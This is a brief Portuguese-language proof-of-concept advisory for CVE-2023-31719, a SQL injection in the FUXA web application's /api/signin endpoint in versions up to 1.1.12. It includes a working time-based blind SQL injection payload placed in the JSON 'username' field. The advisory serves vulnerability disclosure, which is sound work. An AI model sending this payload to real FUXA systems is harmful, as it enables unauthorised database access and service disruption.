
Exploração de prova de conceito para CVE-2023-31719, demonstrando injeção SQL no endpoint /api/signin da aplicação web FUXA através de um parâmetro de nome de usuário JSON manipulado.
É possível injetar código SQL no parâmetro JSON "username" do endpoint /api/signin via requisição HTTP POST
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
Nome do produto afetado: FUXA
Versão afetada: <= 1.1.12
Problema: Injeção SQL
Descrição: É possível injetar código SQL no parâmetro JSON "username" do endpoint /api/signin via requisição HTTP POST